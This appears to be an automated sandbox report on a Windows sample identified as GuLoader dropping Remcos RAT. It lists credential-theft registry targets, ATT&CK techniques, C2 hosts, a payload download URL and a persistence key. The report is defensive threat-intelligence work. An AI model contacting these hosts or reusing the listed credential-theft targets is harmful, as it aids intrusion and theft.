          Source: g4FtSOZMD9.exe, 00000009.00000002.621030433.00000000020B0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
          Source: g4FtSOZMD9.exe, 00000009.00000003.582710276.0000000001C78000.00000004.00000001.sdmp | Binary or memory string: |Program Manager|
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_00406B06 GetVersionExA,
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_00407C79 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,

          Stealing of Sensitive Information:

          Yara detected Remcos RAT
          Source: Yara match | File source: 00000009.00000002.620873156.0000000001C23000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: g4FtSOZMD9.exe PID: 5452, type: MEMORYSTR
          GuLoader behavior detected
          Source: Initial file | Signature Results: GuLoader behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
          Tries to steal Mail credentials (via file registry)
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: ESMTPPassword
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword
          Yara detected WebBrowserPassView password recovery tool
          Source: Yara match | File source: Process Memory Space: g4FtSOZMD9.exe PID: 5524, type: MEMORYSTR
          Tries to steal Instant Messenger accounts or passwords
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt

          Remote Access Functionality:

          Yara detected Remcos RAT
          Source: Yara match | File source: 00000009.00000002.620873156.0000000001C23000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: g4FtSOZMD9.exe PID: 5452, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API 1 | Application Shimming 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | Input Capture 11 | Account Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Registry Run Keys / Startup Folder 11 | Access Token Manipulation 1 | Obfuscated Files or Information 2 | Credentials in Registry 2 | File and Directory Discovery 1 | Remote Desktop Protocol | Email Collection 1 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Process Injection 112 | Software Packing 11 | Credentials In Files 1 | System Information Discovery 16 | SMB/Windows Admin Shares | Input Capture 11 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder 11 | Masquerading 1 | NTDS | Security Software Discovery 41 | Distributed Component Object Model | Clipboard Data 1 | Scheduled Transfer | Non-Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion 221 | LSA Secrets | Process Discovery 3 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 112 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Access Token Manipulation 1 | Cached Domain Credentials | Virtualization/Sandbox Evasion 221 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 112 | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Owner/User Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Remote System Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

          Behavior Graph

          Behavior Graph ID: 547022; Sample: g4FtSOZMD9; Startdate: 02/01/2022; Architecture: WINDOWS; Score: 100
          Start: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures
          Start -> g4FtSOZMD9.exe (started): Detected unpacking (changes PE section rights); Tries to steal Mail credentials (via file registry); Creates autostart registry keys with suspicious values (likely registry only malware); 2 other signatures
            -> g4FtSOZMD9.exe (started): network: 147.189.137.168 (ports 49835, 80; JANETJiscServicesLimitedGB, United Kingdom), nhtaxfilling.ddnsgeek.com 207.32.218.236 (ports 49836, 49837, 49843; 1GSERVERSUS, United States); dropped: C:\Users\user\AppData\Local\...\Restroke.exe (PE32), C:\Users\user\AppData\Local\...\Restroke.vbs (ASCII); signatures: Tries to detect Any.run; Hides threads from debuggers; Installs a global keyboard hook; Injects a PE file into a foreign processes
              -> g4FtSOZMD9.exe (started): Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access)
              -> g4FtSOZMD9.exe (started)
              -> g4FtSOZMD9.exe (started)
              -> svchost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          g4FtSOZMD9.exe | 22% | Virustotal |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.exe | 16% | ReversingLabs |

          Unpacked PE Files

          Source | Detection | Scanner | Label
          9.0.g4FtSOZMD9.exe.400000.2.unpack | 100% | Avira | TR/Dropper.VB.Gen
          0.0.g4FtSOZMD9.exe.400000.0.unpack | 100% | Avira | TR/Dropper.VB.Gen
          21.0.g4FtSOZMD9.exe.400000.0.unpack | 100% | Avira | TR/Dropper.VB.Gen
          23.2.g4FtSOZMD9.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1116590
          9.0.g4FtSOZMD9.exe.400000.3.unpack | 100% | Avira | TR/Dropper.VB.Gen
          22.2.g4FtSOZMD9.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1116590
          22.0.g4FtSOZMD9.exe.400000.0.unpack | 100% | Avira | TR/Dropper.VB.Gen
          9.0.g4FtSOZMD9.exe.400000.0.unpack | 100% | Avira | TR/Dropper.VB.Gen
          0.2.g4FtSOZMD9.exe.400000.0.unpack | 100% | Avira | TR/Dropper.VB.Gen
          9.0.g4FtSOZMD9.exe.400000.1.unpack | 100% | Avira | TR/Dropper.VB.Gen
          23.0.g4FtSOZMD9.exe.400000.0.unpack | 100% | Avira | TR/Dropper.VB.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://www.imvu.comr | 0% | URL Reputation | safe
          https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
          https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js | 0% | URL Reputation | safe
          http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z | 0% | Avira URL Cloud | safe
          http://crl.pki.goog/GTS1O1core.crl0 | 0% | URL Reputation | safe
          https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill% | 0% | URL Reputation | safe
          http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ1Y2M3ZjUxNTk0ZjI1ZWI5NjQxNjllMjcxMDliYzA5MWY4N | 0% | Avira URL Cloud | safe
          http://pki.goog/gsr2/GTS1O1.crt0 | 0% | URL Reputation | safe
          https://pki.goog/repository/0 | 0% | URL Reputation | safe
          https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1 | 0% | URL Reputation | safe
          nhtaxfilling.ddnsgeek.com | 0% | Avira URL Cloud | safe
          https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js | 0% | URL Reputation | safe
          http://crl.pki.goog/gsr2/gsr2.crl0? | 0% | URL Reputation | safe
          http://pki.goog/gsr2/GTSGIAG3.crt0) | 0% | URL Reputation | safe
          http://ns.adobe.c/g? | 0% | Avira URL Cloud | safe
          http://pki.goog/gsr2/GTS1O1.crt0# | 0% | URL Reputation | safe
          http://147.189.137.168/1040_RyQoPlW98.bin | 0% | Avira URL Cloud | safe
          http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe
          http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL | 0% | URL Reputation | safe
          http://147.189.137.168/1040_RyQoPlW98.bin~: | 0% | Avira URL Cloud | safe
          http://images.outbrainimg.com/transform/v3/eyJpdSI6IjJhM2VjZmJmYzJjMzAzZjVjMGM1MjhiNDZjYWEyNDY0MGI2M | 0% | Avira URL Cloud | safe
          https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt | 0% | URL Reputation | safe
          http://crl.pki.goog/GTSGIAG3.crl0 | 0% | URL Reputation | safe
          https://logincdn.msauth.net/16.000.28230.00/MeControl.js | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          nhtaxfilling.ddnsgeek.com | 207.32.218.236 | true | true | | unknown

            Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          nhtaxfilling.ddnsgeek.com | true | Avira URL Cloud: safe | unknown
          http://147.189.137.168/1040_RyQoPlW98.bin | true | Avira URL Cloud: safe | unknown

            URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate | bhvFAB7.tmp.21.dr | false | | high
          https://www.google.com/chrome/static/images/folder-applications.svg | bhvFAB7.tmp.21.dr | false | | high
          http://www.imvu.comr | g4FtSOZMD9.exe, 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
          https://www.google.com/chrome/static/css/main.v2.min.css | bhvFAB7.tmp.21.dr | false | | high
          https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg | bhvFAB7.tmp.21.dr | false | | high
          http://www.msn.com | bhvFAB7.tmp.21.dr | false | | high
          https://deff.nelreports.net/api/report?cat=msn | bhvFAB7.tmp.21.dr | false | URL Reputation: safe | unknown
          http://google.com/chrome | bhvFAB7.tmp.21.dr | false | | high
          https://contextual.media.net/__media__/js/util/nrrV9140.js | bhvFAB7.tmp.21.dr | false | | high
          https://www.google.com/chrome/static/images/chrome-logo.svg | bhvFAB7.tmp.21.dr | false | | high
          https://www.google.com/chrome/static/images/homepage/homepage_features.png | bhvFAB7.tmp.21.dr | false | | high
          https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js | bhvFAB7.tmp.21.dr | false | URL Reputation: safe | unknown
          https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png | bhvFAB7.tmp.21.dr | false | | high
          https://www.google.com/chrome/ | bhvFAB7.tmp.21.dr | false | | high
          https://www.google.com | g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp | false | | high
          http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z | bhvFAB7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
          https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f | bhvFAB7.tmp.21.dr | false | | high
          https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png | bhvFAB7.tmp.21.dr | false | | high
          https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg | bhvFAB7.tmp.21.dr | false | | high
          http://www.msn.com/?ocid=iehp | bhvFAB7.tmp.21.dr | false | | high
          https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3 | bhvFAB7.tmp.21.dr | false | | high
          http://crl.pki.goog/GTS1O1core.crl0 | bhvFAB7.tmp.21.dr | false | URL Reputation: safe | unknown
          https://cvision.media.net/new/300x300/2/189/9/46/83cfba42-7d45-4670-a4a7-a3211ca07534.jpg?v=9 | bhvFAB7.tmp.21.dr | false | | high
          https://www.google.com/chrome/static/images/icon-announcement.svg | bhvFAB7.tmp.21.dr | false | | high
          http://www.nirsoft.net/ | g4FtSOZMD9.exe, 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp | false | | high
          https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill% | bhvFAB7.tmp.21.dr | false | URL Reputation: safe | unknown
          https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png | bhvFAB7.tmp.21.dr | false | | high
          http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ1Y2M3ZjUxNTk0ZjI1ZWI5NjQxNjllMjcxMDliYzA5MWY4N | bhvFAB7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
          https://www.google.com/chrome/static/css/main.v3.min.css | bhvFAB7.tmp.21.dr | false | | high
          https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm= | bhvFAB7.tmp.21.dr | false | | high
          https://www.google.com/chrome/application/x-msdownloadC: | bhvFAB7.tmp.21.dr | false | | high
          https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg | bhvFAB7.tmp.21.dr | false | | high
          https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee | bhvFAB7.tmp.21.dr | false | | high
          http://www.imvu.com | g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp | false | | high
          https://www.google.com/chrome/static/images/download-browser/pixel_phone.png | bhvFAB7.tmp.21.dr | false | | high
          http://pki.goog/gsr2/GTS1O1.crt0 | bhvFAB7.tmp.21.dr | false | URL Reputation: safe | unknown
          https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1 | bhvFAB7.tmp.21.dr | false | | high
          https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml | bhvFAB7.tmp.21.dr | false | | high
          https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex | g4FtSOZMD9.exe, 00000015.00000003.616430526.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616818269.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616919140.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616667092.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616571537.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616756654.0000000002283000.00000004.00000001.sdmp | false | | high
          https://www.google.com/chrome/static/images/app-store-download.png | bhvFAB7.tmp.21.dr | false | | high
          https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png | bhvFAB7.tmp.21.dr | false | | high
          https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g | bhvFAB7.tmp.21.dr | false | | high
          https://contextual.media.net/ | bhvFAB7.tmp.21.dr | false | | high
          https://pki.goog/repository/0 | bhvFAB7.tmp.21.dr | false | URL Reputation: safe | unknown
          https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1 | bhvFAB7.tmp.21.dr | false | URL Reputation: safe | unknown
          https://srtb.msn.com/auction?a=de-ch&b=fa1a6a09db4c4f6fbf480b78c51caf60&c=MSN&d=http%3A%2F%2Fwww.msn | bhvFAB7.tmp.21.dr | false | | high
          https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736 | bhvFAB7.tmp.21.dr | false | | high
                                                                                      https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9bhvFAB7.tmp.21.drfalse
                                                                                        high
                                                                                        http://www.msn.com/bhvFAB7.tmp.21.drfalse
                                                                                          high
                                                                                          https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734bhvFAB7.tmp.21.drfalse
                                                                                            high
                                                                                            https://www.google.com/chromebhvFAB7.tmp.21.drfalse
                                                                                              high
                                                                                              https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpgbhvFAB7.tmp.21.drfalse
                                                                                                high
                                                                                                https://www.google.com/chrome/static/images/fallback/icon-twitter.jpgbhvFAB7.tmp.21.drfalse
                                                                                                  high
                                                                                                  http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804bhvFAB7.tmp.21.drfalse
                                                                                                    high
                                                                                                    https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3bhvFAB7.tmp.21.drfalse
                                                                                                      high
                                                                                                      https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.jsbhvFAB7.tmp.21.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://contextual.media.net/48/nrrV18753.jsbhvFAB7.tmp.21.drfalse
                                                                                                        high
                                                                                                        https://www.google.com/chrome/static/images/fallback/icon-help.jpgbhvFAB7.tmp.21.drfalse
                                                                                                          high
                                                                                                          https://cvision.media.net/new/286x175/2/189/134/171/257b11a9-f3a3-4bb3-9298-c791f456f3d0.jpg?v=9bhvFAB7.tmp.21.drfalse
                                                                                                            high
                                                                                                            https://www.google.com/accounts/serviceloging4FtSOZMD9.exefalse
                                                                                                              high
                                                                                                              https://www.google.com/chrome/static/images/homepage/google-enterprise.pngbhvFAB7.tmp.21.drfalse
                                                                                                                high
                                                                                                                https://www.google.com/chrome/static/images/homepage/google-dev.pngbhvFAB7.tmp.21.drfalse
                                                                                                                  high
                                                                                                                  https://www.google.com/chrome/static/images/thank-you/thankyou-animation.jsonbhvFAB7.tmp.21.drfalse
                                                                                                                    high
                                                                                                                    http://crl.pki.goog/gsr2/gsr2.crl0?bhvFAB7.tmp.21.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://pki.goog/gsr2/GTSGIAG3.crt0)bhvFAB7.tmp.21.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://www.google.com/bhvFAB7.tmp.21.drfalse
                                                                                                                      high
                                                                                                                      https://www.google.com/chrome/static/images/fallback/icon-fb.jpgbhvFAB7.tmp.21.drfalse
                                                                                                                        high
                                                                                                                        http://ns.adobe.c/g?g4FtSOZMD9.exe, 00000009.00000003.577311939.0000000020E52000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000002.624858543.0000000020E50000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.596412607.0000000020E50000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.577281474.0000000020E41000.00000004.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://www.google.com/chrome/static/images/mac-ico.pngbhvFAB7.tmp.21.drfalse
                                                                                                                          high
                                                                                                                          http://pki.goog/gsr2/GTS1O1.crt0#bhvFAB7.tmp.21.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://www.google.com/chrome/static/images/google-play-download.pngbhvFAB7.tmp.21.drfalse
                                                                                                                            high
                                                                                                                            https://www.google.com/chrome/static/images/chrome_throbber_fast.gifbhvFAB7.tmp.21.drfalse
                                                                                                                              high
                                                                                                                              https://www.google.com/chrome/static/images/homepage/google-canary.pngbhvFAB7.tmp.21.drfalse
                                                                                                                                high
                                                                                                                                https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngbhvFAB7.tmp.21.drfalse
                                                                                                                                  high
                                                                                                                                  https://geolocation.onetrust.com/cookieconsentpub/v1/geo/locationbhvFAB7.tmp.21.drfalse
                                                                                                                                    high
                                                                                                                                    https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.pngbhvFAB7.tmp.21.drfalse
                                                                                                                                      high
                                                                                                                                      https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsbhvFAB7.tmp.21.drfalse
                                                                                                                                        high
                                                                                                                                        https://www.google.com/chrome/static/images/homepage/laptop_desktop.pngbhvFAB7.tmp.21.drfalse
                                                                                                                                          high
                                                                                                                                          https://www.google.com/chrome/static/js/main.v2.min.jsbhvFAB7.tmp.21.drfalse
                                                                                                                                            high
                                                                                                                                            https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpgbhvFAB7.tmp.21.drfalse
                                                                                                                                              high
                                                                                                                                              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbfbhvFAB7.tmp.21.drfalse
                                                                                                                                                high
                                                                                                                                                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comg4FtSOZMD9.exe, 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tLbhvFAB7.tmp.21.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629bhvFAB7.tmp.21.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.google.com/chrome/static/images/homepage/homepage_privacy.pngbhvFAB7.tmp.21.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2bhvFAB7.tmp.21.drfalse
                                                                                                                                                      high
                                                                                                                                                      http://147.189.137.168/1040_RyQoPlW98.bin~:g4FtSOZMD9.exe, 00000009.00000002.620803230.0000000001BD7000.00000004.00000020.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://www.google.com/chrome/static/images/fallback/icon-youtube.jpgbhvFAB7.tmp.21.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9B620FEEbhvFAB7.tmp.21.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://login.yahoo.com/config/loging4FtSOZMD9.exefalse
                                                                                                                                                            high
                                                                                                                                                            https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0bhvFAB7.tmp.21.drfalse
                                                                                                                                                              high
                                                                                                                                                              http://images.outbrainimg.com/transform/v3/eyJpdSI6IjJhM2VjZmJmYzJjMzAzZjVjMGM1MjhiNDZjYWEyNDY0MGI2MbhvFAB7.tmp.21.drfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtbhvFAB7.tmp.21.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://cvision.media.net/new/300x300/3/237/70/222/47ef75a1-aa03-4dce-a349-91d6a5ed47bb.jpg?v=9bhvFAB7.tmp.21.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.google.com/chrome/static/images/cursor-replay.curbhvFAB7.tmp.21.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.google.com/chrome/static/js/installer.min.jsbhvFAB7.tmp.21.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://crl.pki.goog/GTSGIAG3.crl0bhvFAB7.tmp.21.drfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://logincdn.msauth.net/16.000.28230.00/MeControl.jsbhvFAB7.tmp.21.drfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown

Contacted IPs


Public

IP               Domain                      Country         ASN     ASN Name                     Malicious
147.189.137.168  unknown                     United Kingdom  786     JANETJiscServicesLimitedGB   true
207.32.218.236   nhtaxfilling.ddnsgeek.com   United States   143151  GSERVERSUS                   true

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 547022
Start date: 02.01.2022
Start time: 02:25:14
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 32s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: g4FtSOZMD9 (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winEXE@11/24@1/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 19% (good quality ratio 16.8%)
• Quality average: 68.6%
• Quality standard deviation: 34.1%
HCA Information:
• Successful, ratio: 73%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 40.127.240.158, 51.104.136.2, 204.79.197.200, 13.107.21.200
• Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, arc.msn.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time | Type | Description
02:27:12 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOME C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.vbs
